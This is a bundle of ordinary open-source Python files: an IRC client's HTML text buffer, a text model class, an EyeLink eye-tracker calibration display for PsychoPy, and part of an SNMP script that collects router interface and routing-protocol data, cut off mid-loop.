class ScanHandler(xml.sax.ContentHandler):
def __init__(self):
xml.sax.ContentHandler.__init__(self)
class HTMLBuffer(gtk.TextBuffer):
__gtype_name__ = "HTMLBuffer"
global_tagtable = gtk.TextTagTable()
def __init__(self, handler=None, tagtable=None):
self.lines = 0
self.group_string = None
self.group_color = False
if tagtable:
self.tagtable = tagtable
else:
self.tagtable = self.global_tagtable
self.URLHandler = handler
gtk.TextBuffer.__init__(self, self.tagtable)
self.scanner = xml.sax.make_parser()
self.parser = xml.sax.make_parser()
self.scanner.setContentHandler(ScanHandler())
contentHandler = HTMLHandler(self, self.URLHandler)
self.parser.setContentHandler(contentHandler)
def setURLHandler(self, handler):
self.URLHandler = handler
self.parser.getContentHandler().URLHandler = handler
def getURLHandler(self):
return self.URLHandler
def clear(self):
""" Clears the output and resets the tag
table to zero to save memory.
"""
self.set_text("")
# clear the tagtable
tt = self.get_tag_table()
if tt:
tt.foreach(lambda tag,data: data.remove(tag), tt)
def insert(self, iter, text, *x):
" make the buffer a ring buffer with a limit of max_output_lines "
siter = self.get_selection_bounds()
if siter:
soff = siter[0].get_offset()
ioff = siter[1].get_offset()
gtk.TextBuffer.insert(self, iter, text, *x)
self.lines += text.count("\n")
try:
max_lines = int(config.get("tekka",
"max_output_lines"))
except ValueError:
max_lines = int(config.get_default("tekka",
"max_output_lines"))
diff = self.lines - max_lines
if diff > 0:
a = self.get_iter_at_line(0)
b = self.get_iter_at_line(diff)
self.delete(a,b)
self.lines -= diff
if siter:
self.select_range(
self.get_iter_at_offset(soff),
self.get_iter_at_offset(ioff)
)
# FIXME new selection range is off by some bytes
def insert_html(self, iter, text, group_string=None):
""" parse text for HTML markups before adding
it to the buffer at the given iter.
This method is deprecated. Use insert_html.
"""
startoffset = iter.get_offset()
if gtk.TextBuffer.get_char_count(self) > 0:
text = "<br/>" + text
text = URLToTag(text)
if self.group_string != group_string:
self.group_string = group_string
self.group_color = not self.group_color
# color the lines, group coloring by some string
if (config.get_bool("tekka","text_rules")
and self.group_color
and self.group_string):
color = helper.color.get_color_by_key("rules_color").to_string()
text = "<msg paragraph-background='%s'>%s</msg>" % (
color, text)
else:
text = "<msg>%s</msg>" % text
def applyToParser(text):
try:
self.parser.parse(StringIO(text))
except xml.sax.SAXParseException,e:
raise Exception,\
"%s.applyToParser: '%s' raised with '%s'." % (e, text)
while True:
try:
self.scanner.parse(StringIO(text))
except xml.sax.SAXParseException, e:
# Exception while parsing, get (if caused by char)
# the character and delete it. Then try again to
# add the text.
# If the exception is caused by a syntax error,
# abort parsing and print the error with line
# and position.
pos = e.getColumnNumber()
line = e.getLineNumber()
if (pos-2 >= 0 and text[pos-2:pos] == "</"):
logging.error("Syntax error on line %d, "\
"column %d: %s\n\t%s" % (
line,
pos,
text[pos:],
text))
return
logging.error("HTMLBuffer: faulty char on line %d "
"char %d ('%s')" % (line, pos, text[pos]))
# skip the faulty char
text = text[:pos] + text[pos+1:]
continue
else:
# everything went fine, no need
# for looping further.
applyToParser(text)
break
| {
"content_hash": "a646b3f239eacb254f46d9a9a82bd21f",
"timestamp": "",
"source": "github",
"line_count": 397,
"max_line_length": 74,
"avg_line_length": 24.869017632241814,
"alnum_prop": 0.6709206927985415,
"repo_name": "sushi-irc/tekka",
"id": "e7b94f9609f1de3df18923c4a13677cf2cdf3dab",
"size": "9889",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tekka/lib/htmlbuffer.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "483168"
}
],
"symlink_target": ""
} |
#!/usr/bin/env python
"""
"""
from cortical.models.fingerprint import Fingerprint
class Text(object):
def __init__(self, text=None, fingerprint=None):
#The text as a string
self.text = text # str
#The semantic fingerprint representation of the text.
self.fingerprint = Fingerprint(**fingerprint) if isinstance(fingerprint, dict) else fingerprint # Fingerprint
| {
"content_hash": "8c852cebd202b8c92f6d2a423c25e331",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 117,
"avg_line_length": 31.307692307692307,
"alnum_prop": 0.6781326781326781,
"repo_name": "cortical-io/python-client-sdk",
"id": "511cfc96ba83f8fa2cc5298b69b91f8c63abd90e",
"size": "813",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "cortical/models/text.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "58412"
}
],
"symlink_target": ""
} |
from psychopy import visual, monitors, event, core, sound
from numpy import linspace
from math import sin, cos, pi
from PIL import Image
import array, string, pylink, psychopy, pygaze
from pygaze import settings
from pygaze.screen import Screen
class EyeLinkCoreGraphicsPsychoPy(pylink.EyeLinkCustomDisplay):
def __init__(self, libeyelink, win, tracker):#
"""Initialize a Custom EyeLinkCoreGraphics
tracker: an eye-tracker instance
win: the Psychopy display we plan to use for stimulus presentation """
pylink.EyeLinkCustomDisplay.__init__(self)
self.tracker = tracker
self.display = win
self.libeyelink = libeyelink
# win = self.display
# Let's disable the beeps as the Psychopy "sound" module will bite our ass
#self.__target_beep__ = sound.Sound('type.wav')
#self.__target_beep__done__ = sound.Sound('qbeep.wav')
#self.__target_beep__error__ = sound.Sound('error.wav')
self.imgBuffInitType = 'I'
self.imagebuffer = array.array(self.imgBuffInitType)
self.pal = None
self.size = (384,320)
self.bg_color = win.color
self.sizeX = win.size[0]
self.sizeY = win.size[1]
# check the screen units of Psychopy and make all necessary conversions for the drawing functions
self.units = win.units
self.monWidthCm = win.monitor.getWidth()
self.monViewDist = win.monitor.getDistance()
self.monSizePix = win.monitor.getSizePix()
# a scaling factor to make the screen units right for Psychopy
self.cfX = 1.0
self.cfY = 1.0
if self.units == 'pix':
pass
elif self.units == 'height':
self.cfX = 1.0/self.monSizePix[1]
self.cfY = 1.0/self.monSizePix[1]
elif self.units == 'norm':
self.cfX = 2.0/self.monSizePix[0]
self.cfY = 2.0/self.monSizePix[1]
elif self.units == 'cm':
self.cfX = self.monWidthCm*1.0/self.monSizePix[0]
self.cfY = self.cfX
else: # here comes the 'deg*' units
self.cfX = self.monWidthCm/self.monViewDist/pi*180.0/self.monSizePix[0]
self.cfY = self.cfX
# initial setup for the mouse
self.display.mouseVisible = False
self.mouse = event.Mouse(visible=False)
self.mouse.setPos([0,0]) # make the mouse appear at the center of the camera image
self.last_mouse_state = -1
# image title
self.msgHeight = self.size[1]/20.0*self.cfY
self.title = visual.TextStim(self.display,'', height=self.msgHeight, color=[1,1,1])
# lines
self.line = visual.Line(self.display, start=(0, 0), end=(0,0),
lineWidth=2.0*self.cfX, lineColor=[0,0,0])
# Stolen from PyGaze
self.esc_pressed = None
self.display_open = True
self.xc = 0
self.yc = 0
self.extra_info = True
self.ld = 40 # line distance
self.fontsize = libeyelink.fontsize
self.draw_menu_screen()
def draw_menu_screen(self):
""" Draws menu screen """
title = visual.TextStim(win=self.display, text="Eyelink calibration menu",
pos=(self.xc, self.yc + 6 * self.ld), font='mono',
height=int(2 * self.fontsize), antialias=True, color='black')
vers = visual.TextStim(win=self.display, text="%s (pygaze %s, pylink %s)" \
% (self.libeyelink.eyelink_model, pygaze.version,
pylink.__version__),
pos=(self.xc, self.yc + 5 * self.ld),
font='mono', height=int(.8 * self.fontsize), antialias=True,
color='black')
cal = visual.TextStim(win=self.display, text="Press C to calibrate",
pos=(self.xc, self.yc + 3 * self.ld), font='mono',
height=self.fontsize, antialias=True, color='black')
val = visual.TextStim(win=self.display, text="Press V to validate",
pos=(self.xc, self.yc + 2 * self.ld), font='mono',
height=self.fontsize, antialias=True, color='black')
autothres = visual.TextStim(win=self.display, text="Press A to auto-threshold",
pos=(self.xc, self.yc + 1 * self.ld), font='mono',
height=self.fontsize, antialias=True, color='black')
extra_info = visual.TextStim(win=self.display, text="Press I to toggle extra info in camera image",
pos=(self.xc, self.yc - 0 * self.ld), font='mono',
height=self.fontsize, antialias=True, color='black')
cam = visual.TextStim(win=self.display, text="Press Enter to show camera image",
pos=(self.xc, self.yc - 1 * self.ld), font='mono',
height=self.fontsize, antialias=True, color='black')
arrow_keys = visual.TextStim(win=self.display, text="(then change between images using the arrow keys)",
pos=(self.xc, self.yc - 2 * self.ld), font='mono',
height=self.fontsize, antialias=True, color='black')
abort = visual.TextStim(win=self.display, text="Press Escape to abort experiment",
pos=(self.xc, self.yc - 4 * self.ld), font='mono',
height=self.fontsize, antialias=True, color='black')
exit = visual.TextStim(win=self.display, text="Press Q to exit menu",
pos=(self.xc, self.yc - 5 * self.ld), font='mono',
height=self.fontsize, antialias=True, color='black')
self.menuscreen = [title, vers, cal, val, autothres, extra_info, cam, arrow_keys, abort, exit]
def close(self):
self.display_open = False
def setTracker(self, tracker):
""" set proper tracker parameters """
self.tracker = tracker
self.tracker_version = tracker.getTrackerVersion()
if self.tracker_version >=3:
self.tracker.sendCommand("enable_search_limits=YES")
self.tracker.sendCommand("track_search_limits=YES")
self.tracker.sendCommand("autothreshold_click=YES")
self.tracker.sendCommand("autothreshold_repeat=YES")
self.tracker.sendCommand("enable_camera_position_detect=YES")
def setup_cal_display(self):
"""Set up the calibration display before entering the calibration/validation routine"""
self.display.color = self.bg_color
self.title.autoDraw = False
for menu_screen_item in self.menuscreen:
menu_screen_item.draw()
self.display.flip()
# show instructions
# self.libeyelink.display.fill(self.menuscreen)
# self.libeyelink.display.show()
def clear_cal_display(self):
"""Clear the calibration display"""
for menu_screen_item in self.menuscreen:
menu_screen_item.setAutoDraw(False)
self.display.color = self.bg_color
def exit_cal_display(self):
"""Exit the calibration/validation routine"""
self.clear_cal_display()
def record_abort_hide(self):
"""This function is called if aborted"""
pass
def erase_cal_target(self):
"""Erase the calibration/validation & drift-check target"""
self.display.color = self.bg_color
self.display.flip()
def draw_cal_target(self, x, y):#
"""Draw the calibration/validation & drift-check target"""
xVis = (x - self.sizeX/2)*self.cfX
yVis = (self.sizeY/2 - y)*self.cfY
cal_target_out = visual.GratingStim(self.display, tex='none', mask='circle', size=2.0/100*self.sizeX*self.cfX, color=[1.0,1.0,1.0])
cal_target_in = visual.GratingStim(self.display, tex='none', mask='circle', size=2.0/300*self.sizeX*self.cfX, color=[-1.0,-1.0,-1.0])
cal_target_out.setPos((xVis, yVis))
cal_target_in.setPos((xVis, yVis))
cal_target_out.draw()
cal_target_in.draw()
self.display.flip()
def play_beep(self, beepid):
""" Play a sound during calibration/drift correct.
SM: this method was taken from PyGaze's method and adjusted to use PsychoPy windows
"""
# pass
# we need to disable the beeps to make this library work on all platforms
#if beepid == pylink.CAL_TARG_BEEP or beepid == pylink.DC_TARG_BEEP:
# self.__target_beep__.play()
#if beepid == pylink.CAL_ERR_BEEP or beepid == pylink.DC_ERR_BEEP:
# self.__target_beep__error__.play()
#if beepid in [pylink.CAL_GOOD_BEEP, pylink.DC_GOOD_BEEP]:
# self.__target_beep__done__.play()
if beepid == pylink.CAL_TARG_BEEP:
# For some reason, playing the beep here doesn't work, so we have
# to play it when the calibration target is drawn.
if settings.EYELINKCALBEEP:
self.__target_beep__.play()
elif beepid == pylink.CAL_ERR_BEEP or beepid == pylink.DC_ERR_BEEP:
# Calibration lost
cal_lost = visual.TextStim(self.display, text="Calibration lost, press 'enter' to return to menu",
pos=(self.xc, self.yc), font='mono', height=self.fontsize, antialias=True)
cal_lost.draw()
self.display.flip()
# play beep
if settings.EYELINKCALBEEP:
self.__target_beep__error__.play()
elif beepid == pylink.CAL_GOOD_BEEP:
if self.state == "calibration":
# Calibration was a success
cal_succ = visual.TextStim(self.display, text="Calibration succesful, press 'v' to validate",
pos=(self.xc, self.yc), font='mono', height=self.fontsize, antialias=True)
cal_succ.draw()
elif self.state == "validation":
# validation was successful
val_succ = visual.TextStim(self.display, text="Validation succesful, press 'enter' to return to menu",
pos=(self.xc, self.yc), font='mono', height=self.fontsize, antialias=True)
val_succ.draw()
else:
# Cal + val done, return to menu
ret = visual.TextStim(self.display, text="Press 'enter' to return to menu",
pos=(self.xc, self.yc), font='mono', height=self.fontsize, antialias=True)
ret.draw()
# Flip display
self.display.flip()
# play beep
if settings.EYELINKCALBEEP:
self.__target_beep__done__.play()
else: # DC_GOOD_BEEP or DC_TARG_BEEP
pass
def getColorFromIndex(self, colorindex):
"""Return psychopy colors for elements in the camera image"""
if colorindex == pylink.CR_HAIR_COLOR: return (1, 1, 1)
elif colorindex == pylink.PUPIL_HAIR_COLOR: return (1, 1, 1)
elif colorindex == pylink.PUPIL_BOX_COLOR: return (-1, 1, -1)
elif colorindex == pylink.SEARCH_LIMIT_BOX_COLOR: return (1, -1, -1)
elif colorindex == pylink.MOUSE_CURSOR_COLOR: return (1, -1, -1)
else: return (0,0,0)
def draw_line(self, x1, y1, x2, y2, colorindex):
"""Draw a line. This is used for drawing crosshairs/squares"""
y1 = (y1 * -1 + self.size[1]/2)*self.cfY
x1 = (x1 * 1 - self.size[0]/2)*self.cfX
y2 = (y2 * -1 + self.size[1]/2)*self.cfY
x2 = (x2 * 1 - self.size[0]/2)*self.cfX
color = self.getColorFromIndex(colorindex)
self.line.start = (x1, y1)
self.line.end = (x2, y2)
self.line.lineColor = color
self.line.draw()
def draw_lozenge(self, x, y, width, height, colorindex):
""" draw a lozenge to show the defined search limits"""
y = (y * -1 + self.size[1] - self.size[1]/2)*self.cfY
x = (x * 1 - self.size[0]/2)*self.cfX
width = width*self.cfX; height = height*self.cfY
color = self.getColorFromIndex(colorindex)
if width > height:
rad = height / 2
if rad == 0:
return #cannot draw the circle with 0 radius
#draw the lines
line1 = visual.Line(self.display, lineColor=color, lineWidth=2.0*self.cfX, start=(x + rad, y), end=(x + width - rad, y))
line2 = visual.Line(self.display, lineColor=color, lineWidth=2.0*self.cfX, start=(x + rad, y - height), end=(x + width - rad, y - height))
#draw semicircles
Xs1 = [rad*cos(t) + x + rad for t in linspace(pi/2, pi/2+pi, 72)]
Ys1 = [rad*sin(t) + y - rad for t in linspace(pi/2, pi/2+pi, 72)]
Xs2 = [rad*cos(t) + x - rad + width for t in linspace(pi/2+pi, pi/2+2*pi, 72)]
Ys2 = [rad*sin(t) + y - rad for t in linspace(pi/2+pi, pi/2+2*pi, 72)]
lozenge1 = visual.ShapeStim(self.display, vertices = zip(Xs1, Ys1), lineWidth=2.0*self.cfX, lineColor=color, closeShape=False)
lozenge2 = visual.ShapeStim(self.display, vertices = zip(Xs2, Ys2), lineWidth=2.0*self.cfX, lineColor=color, closeShape=False)
else:
rad = width / 2
#draw the lines
line1 = visual.Line(self.display, lineColor=color, lineWidth=2.0*self.cfX, start=(x, y - rad), end=(x, y - height + rad))
line2 = visual.Line(self.display, lineColor=color, lineWidth=2.0*self.cfX, start=(x + width, y - rad), end=(x + width, y - height + rad))
#draw semicircles
if rad == 0:
return #cannot draw sthe circle with 0 radius
Xs1 = [rad*cos(t) + x + rad for t in linspace(0, pi, 72)]
Ys1 = [rad*sin(t) + y - rad for t in linspace(0, pi, 72)]
Xs2 = [rad*cos(t) + x + rad for t in linspace(pi, 2*pi, 72)]
Ys2 = [rad*sin(t) + y + rad - height for t in linspace(pi, 2*pi, 72)]
lozenge1 = visual.ShapeStim(self.display, vertices = zip(Xs1, Ys1),lineWidth=2.0*self.cfX, lineColor=color, closeShape=False)
lozenge2 = visual.ShapeStim(self.display, vertices = zip(Xs2, Ys2),lineWidth=2.0*self.cfX, lineColor=color, closeShape=False)
lozenge1.draw()
lozenge2.draw()
line1.draw()
line2.draw()
def get_mouse_state(self):#
"""Get the current mouse position and status"""
X, Y = self.mouse.getPos()
mX = self.size[0]/2 + X*1.0/self.cfX
mY = self.size[1]/2 - Y*1.0/self.cfY
if mX <=0: mX = 0
if mX > self.size[0]: mX = self.size[0]
if mY < 0: mY = 0
if mY > self.size[1]: mY = self.size[1]
state = self.mouse.getPressed()[0]
return ((mX, mY), state)
def get_input_key(self):
""" this function will be constantly pools, update the stimuli here is you need
dynamic calibration target """
if not self.display_open:
return None
ky=[]
for keycode in event.getKeys(modifiers=False):
k= pylink.JUNK_KEY
if keycode == 'f1': k = pylink.F1_KEY
elif keycode == 'f2': k = pylink.F2_KEY
elif keycode == 'f3': k = pylink.F3_KEY
elif keycode == 'f4': k = pylink.F4_KEY
elif keycode == 'f5': k = pylink.F5_KEY
elif keycode == 'f6': k = pylink.F6_KEY
elif keycode == 'f7': k = pylink.F7_KEY
elif keycode == 'f8': k = pylink.F8_KEY
elif keycode == 'f9': k = pylink.F9_KEY
elif keycode == 'f10': k = pylink.F10_KEY
elif keycode == 'pageup': k = pylink.PAGE_UP
elif keycode == 'pagedown': k = pylink.PAGE_DOWN
elif keycode == 'up': k = pylink.CURS_UP
elif keycode == 'down': k = pylink.CURS_DOWN
elif keycode == 'left': k = pylink.CURS_LEFT
elif keycode == 'right': k = pylink.CURS_RIGHT
elif keycode == 'backspace': k = ord('\b')
elif keycode == 'return': k = pylink.ENTER_KEY
elif keycode == 'space': k = ord(' ')
elif keycode == 'escape':
k = 'q'
self.esc_pressed = True
elif keycode == 'q':
k = pylink.ESC_KEY
self.state = None
elif keycode == "c":
k = ord("c")
self.state = "calibration"
elif keycode == "v":
k = ord("v")
self.state = "validation"
elif keycode == "a":
k = ord("a")
elif keycode == "i":
self.extra_info = not self.extra_info
k = 0
elif keycode == 'tab': k = ord('\t')
elif keycode in string.ascii_letters: k = ord(keycode)
elif k== pylink.JUNK_KEY: key = 0
# if modifier['alt']==True: mod = 256
# else: mod = 0
ky.append(pylink.KeyInput(k, 0))
#event.clearEvents()
return ky
def exit_image_display(self):
"""Clcear the camera image"""
self.clear_cal_display()
self.display.flip()
def alert_printf(self,msg):
"""Print error messages."""
print "Error: " + msg
def setup_image_display(self, width, height):
""" set up the camera image, for newer APIs, the size is 384 x 320 pixels"""
self.title.autoDraw = True
self.last_mouse_state = -1
self.size = (width, height)
def image_title(self, text):
"""Draw title text below the camera image"""
self.title.text = text
title_pos = (0, 0-self.size[0]/2.0*self.cfY-self.msgHeight)
self.title.pos = title_pos
def draw_image_line(self, width, line, totlines, buff):#
"""Display image pixel by pixel, line by line"""
#self.size = (width, totlines)
i =0
while i <width:
self.imagebuffer.append(self.pal[buff[i]])
i= i+1
if line == totlines:
bufferv = self.imagebuffer.tostring()
try:
img = Image.frombytes("RGBX", (width, totlines), bufferv) # Pillow
except:
img = Image.fromstring("RGBX", (width, totlines), bufferv) # PIL
imgResize = img.resize((self.size[0], self.size[1]))
imgResizeVisual = visual.ImageStim(self.display, image=imgResize)
imgResizeVisual.draw()
self.draw_cross_hair()
self.display.flip()
self.imagebuffer = array.array(self.imgBuffInitType)
def set_image_palette(self, r,g,b):
"""Given a set of RGB colors, create a list of 24bit numbers representing the pallet.
I.e., RGB of (1,64,127) would be saved as 82047, or the number 00000001 01000000 011111111"""
self.imagebuffer = array.array(self.imgBuffInitType)
#self.clear_cal_display()
sz = len(r)
i =0
self.pal = []
while i < sz:
rf = int(b[i])
gf = int(g[i])
bf = int(r[i])
self.pal.append((rf<<16) | (gf<<8) | (bf))
i = i+1
| {
"content_hash": "3ae0b79d2675271b6b33c94ee84af487",
"timestamp": "",
"source": "github",
"line_count": 464,
"max_line_length": 150,
"avg_line_length": 42.82543103448276,
"alnum_prop": 0.5430023652559005,
"repo_name": "StevenM1/flashtask",
"id": "13e64ad26b1a5a95d0559d9a9f6e1d4c94644280",
"size": "20009",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "exp_tools/eyelink/_eyetracker/EyeLinkCoreGraphicsPsychoPy.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "22917045"
},
{
"name": "Mathematica",
"bytes": "879590"
},
{
"name": "Python",
"bytes": "335678"
}
],
"symlink_target": ""
} |
import os, argparse, json, collections, time, re, logging
from snimpy.manager import Manager as M
from snimpy.manager import load
from pyasn1.type import univ
try:
from ipcalc import Network
except:
os.system("sudo pip install ipcalc")
from ipcalc import Network
try:
from termcolor import colored
except:
os.system("sudo pip install termcolor")
from termcolor import colored
try:
from texttable import Texttable
except:
os.system("sudo pip install texttable")
from texttable import Texttable
try:
import logging
except:
os.system("sudo pip install logging")
import logging
def convertMac(octet):
"""
This Function converts a binary mac address to a hexadecimal string representation
"""
mac = [binascii.b2a_hex(x) for x in list(octet)]
":".join(mac)
def convertIP(octet):
ip = [str(int(binascii.b2a_hex(x),16)) for x in list(octet)]
return ".".join(ip)
# ++++++++++++++++++++
import logging
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
# --------------------
############## Load MIBs
load("RFC1213-MIB") # sysName, ecc..
load("IF-MIB") # ifDescr, ecc..
load("IP-FORWARD-MIB") # routing table
load("IP-MIB") # ipAddress
load("OSPF-MIB") # ospf
load("MPLS-L3VPN-STD-MIB") # vrf
load("MPLS-LDP-STD-MIB") # ldp
load("BGP4-MIB") # bgp
load("ISIS-MIB") # isis
load("RFC1213-MIB") # tcp sessions
try:
load("CISCO-CDP-MIB") # cdp
except:
print "smilint -s -l1 CISCO-CDP-MIB"
os.system("smilint -s -l1 CISCO-CDP-MIB")
os.system("sudo wget ftp://ftp.cisco.com/pub/mibs/v2/CISCO-TC.my -O /usr/local/Cellar/libsmi/0.4.8/share/mibs/iana/CISCO-TC.my")
os.system("sudo wget ftp://ftp.cisco.com/pub/mibs/v2/CISCO-VTP-MIB.my -O /usr/local/Cellar/libsmi/0.4.8/share/mibs/iana/CISCO-VTP-MIB.my")
os.system("sudo wget ftp://ftp.cisco.com/pub/mibs/v2/CISCO-SMI.my -O /usr/local/Cellar/libsmi/0.4.8/share/mibs/iana/CISCO-SMI.my")
os.system("sudo wget ftp://ftp.cisco.com/pub/mibs/v2/CISCO-CDP-MIB.my -O /usr/local/Cellar/libsmi/0.4.8/share/mibs/iana/CISCO-CDP-MIB.my")
print "Install MIBS for CDP... done"
print "Restart application!"
exit()
def minimize(string): # shortnet for interface names (to save space in print)
if "GigabitEthernet" in string:
return string.replace("GigabitEthernet","Gi")
if "FastEthernet" in string:
return string.replace("FastEthernet","Fe")
elif "Loopback" in string:
return string.replace("Loopback","Lo")
elif "Mgm" in string:
return string.replace("MgmtEth","Mgt")
else:
return string
def expand(string): # expand for interface names
if "Gi" in string:
return string.replace("Gi","GigabitEthernet")
else:
return string
tree = lambda: collections.defaultdict(tree)
class MftSNMP(object):
snmpCommunity = "public"
snmpTarget = ""
host = ""
intfs = []
vrfs = []
arps = []
onbrs = []
ldps = []
cdpEns = []
cdpEntrys = []
snmpDevice = tree()
def __init__(self, target, community):
self.snmpTarget = target
self.snmpCommunity = community
m = M(host=self.snmpTarget, community=self.snmpCommunity, version=2, none=True)
##################### methods
for val in m.ifIndex.keys():
self.intfs.append( \
[val, \
m.ifDescr[val], \
m.ifAlias[val], \
m.ifMtu[val], \
str(m.ifAdminStatus[val])[:-3], \
str(m.ifOperStatus[val])[:-3], \
m.ifType[val], \
m.ifPhysAddress[val]] \
)
ips = []
for val in m.ipAdEntIfIndex:
ips.append( \
(m.ifDescr[m.ipAdEntIfIndex[val]], \
m.ipAdEntAddr[val], \
m.ipAdEntNetMask[val]) \
)
for v in m.mplsL3VpnIfVpnClassification.keys():
self.vrfs.append( \
(v[0], \
m.ifDescr[v[1]]) \
)
for i in m.ipNetToMediaPhysAddress:
self.arps.append( \
(m.ifDescr[i[0]], \
i[1], \
m.ipNetToMediaPhysAddress[i]) \
)
tcps = []
for i in m.tcpConnLocalAddress:
tcps.append( \
(i[0], \
i[1], \
i[2], \
i[3]) \
)
#"#"#"#"#"# da rifare
ospfareas = []
area = dict()
areatype = dict()
areatype2 = dict()
for index1,val1 in enumerate(m.ospfAreaId.iteritems()):
area[index1] = val1[1]
for index1,val1 in enumerate(m.ospfImportAsExtern.iteritems()):
areatype[index1] = val1[1]
for index1,val1 in enumerate(m.ospfAreaSummary.iteritems()):
areatype2[index1] = val1[1]
areaintfs = []
for en,i in enumerate(m.ospfIfIpAddress):
for v in m.ipCidrRouteIfIndex:
if str(i[0]) == v[0]:
#print str(i[2])[:-2]
areaintfs.append( \
[i[0],\
m.ifDescr[m.ipCidrRouteIfIndex[v]], \
m.ospfIfAreaId[i], \
m.ospfIfHelloInterval[i], \
m.ospfIfRtrDeadInterval[i], \
m.ospfIfType[i], \
m.ospfIfRtrPriority[i], \
m.ospfIfDesignatedRouter[i], \
m.ospfIfBackupDesignatedRouter[i]] \
)
for metric in m.ospfIfMetricIpAddress:
if m.ospfIfMetricIpAddress[metric] == i[0]:
areaintfs[en].append( \
m.ospfIfMetricValue[metric] \
)
############## Interface Auth
for nbr in m.ospfNbrIpAddr:
self.onbrs.append( \
[m.ospfNbrRtrId[nbr], \
m.ospfNbrIpAddr[nbr], \
m.ospfNbrPriority[nbr], \
m.ospfNbrState[nbr], \
bin(m.ospfNbrOptions[nbr])] \
)
for i in m.mplsLdpPeerTransportAddr:
for v in m.ipCidrRouteIfIndex:
if str(i[2])[:-2] == v[0]:
#print str(i[2])[:-2]
self.ldps.append( \
(i[0], \
i[1], \
str(i[2])[:-2], \
m.ifDescr[m.ipCidrRouteIfIndex[v]]) \
)
for i in m.cdpInterfaceEnable:
self.cdpEns.append( \
(m.ifDescr[i], \
m.cdpInterfaceEnable[i]) \
)
for i in m.cdpCacheAddress.keys():
self.cdpEntrys.append( \
[m.cdpCacheDeviceId[i], \
m.ifDescr[i[0]], \
m.cdpCacheCapabilities[i], \
m.cdpCacheVersion[i], \
m.cdpCacheDevicePort[i], \
m.cdpCacheAddress[i], \
m.cdpCachePlatform[i]]\
)
############## main object
self.host = str(m.sysName)
self.snmpDevice[self.host]['global']['sysName'] = self.host
self.snmpDevice[self.host]['global']['sysDescr'] = m.sysDescr.replace("\r\n"," ")
self.snmpDevice[self.host]['global']['sysObjectID'] = str(m.sysObjectID)
self.snmpDevice[self.host]['global']['sysUpTime'] = str(m.sysUpTime)
self.snmpDevice[self.host]['global']['sysLocation'] = m.sysLocation
######## routing
self.snmpDevice[self.host]['OSPF-MIB']['ospfRouterId'] = str(m.ospfRouterId)
self.snmpDevice[self.host]['BGP4-MIB']['bgpIdentifier'] = str(m.bgpIdentifier)
#"#"#"#"#"#"# verificare anche che lo stato sia establish
lrid = "None"
for tcp in tcps:
if str(tcp[1]) == '646' or str(tcp[3]) == '646':
lrid = tcp[0]
# self.snmpDevice[self.host]['MPLS-LDP-STD-MIB']['mplsLdpLsrId'] = str(m.mplsLdpLsrId)
# self.snmpDevice[self.host]['ISIS-MIB']['isisSysID'] = str(m.isisSysID)
self.snmpDevice[self.host]['CISCO-CDP-MIB']['cdpGlobalRun'] = str(m.cdpGlobalRun)
######## Interface
for intf in self.intfs:
self.snmpDevice[self.host]['interfaces'][intf[1]]['ifDescr'] = intf[1]
self.snmpDevice[self.host]['interfaces'][intf[1]]['ifIndex'] = intf[0]
self.snmpDevice[self.host]['interfaces'][intf[1]]['ifAlias'] = intf[2]
self.snmpDevice[self.host]['interfaces'][intf[1]]['ifMtu'] = intf[3]
self.snmpDevice[self.host]['interfaces'][intf[1]]['ifAdminStatus'] = intf[4]
self.snmpDevice[self.host]['interfaces'][intf[1]]['ifOperStatus'] = intf[5]
self.snmpDevice[self.host]['interfaces'][intf[1]]['ifType'] = intf[6]
self.snmpDevice[self.host]['interfaces'][intf[1]]['ifPhysAddress'] = convertMac(intf[7])
######## ip address
for ip in ips:
if intf[1] == ip[0]:
self.snmpDevice[self.host]['interfaces'][intf[1]]['ipAdEntAddr'] = str(ip[1])
self.snmpDevice[self.host]['interfaces'][intf[1]]['ipAdEntNetMask'] = str(ip[2])
######## vrf
for vrf in self.vrfs:
if intf[1] == vrf[1]:
self.snmpDevice[self.host]['interfaces'][intf[1]]['MPLS-L3VPN-STD-MIB']['mplsL3VpnVrfName'] = str(vrf[0])
######## ARP
for i,arp in enumerate(self.arps):
if intf[1] == arp[0]:
if self.snmpDevice[self.host]['interfaces'][intf[1]]['ipAdEntAddr'] != str(arp[1]): #### da verificare
self.snmpDevice[self.host]['interfaces'][intf[1]]['ipNetToMediaNetAddress'][i] = str(arp[1])
self.snmpDevice[self.host]['interfaces'][intf[1]]['ipNetToMediaPhysAddress'][i] = str(arp[2])
######## OSPF
for areaintf in areaintfs:
if intf[1] == areaintf[1]:
self.snmpDevice[self.host]['interfaces'][intf[1]]['OSPF-MIB']['ospfIfAreaId'] = str(areaintf[2])
self.snmpDevice[self.host]['interfaces'][intf[1]]['OSPF-MIB']['ospfIfHelloInterval'] = int(str(areaintf[3]).replace('.',''))
self.snmpDevice[self.host]['interfaces'][intf[1]]['OSPF-MIB']['ospfIfRtrDeadInterval'] = int(str(areaintf[4]).replace('.',''))
self.snmpDevice[self.host]['interfaces'][intf[1]]['OSPF-MIB']['ospfIfType'] = str(areaintf[5])
self.snmpDevice[self.host]['interfaces'][intf[1]]['OSPF-MIB']['ospfIfRtrPriority'] = int(str(areaintf[6]).replace('.',''))
self.snmpDevice[self.host]['interfaces'][intf[1]]['OSPF-MIB']['ospfIfDesignatedRouter'] = str(areaintf[7])
self.snmpDevice[self.host]['interfaces'][intf[1]]['OSPF-MIB']['ospfIfBackupDesignatedRouter'] = str(areaintf[8])
self.snmpDevice[self.host]['interfaces'][intf[1]]['OSPF-MIB']['ospfIfMetricValue'] = int(str(areaintf[9]).replace('.',''))
# snmpDevice[host]['interfaces'][intf[1]]['OSPF-MIB']['area type'] = ""
# snmpDevice[host]['interfaces'][intf[1]]['OSPF-MIB']['area no summary'] = ""
# snmpDevice[host]['interfaces'][intf[1]]['OSPF-MIB']['int auth'] = ""
############## OSPF Neighbors filterd per interface
for i,onbr in enumerate(self.onbrs):
# print intf[1]
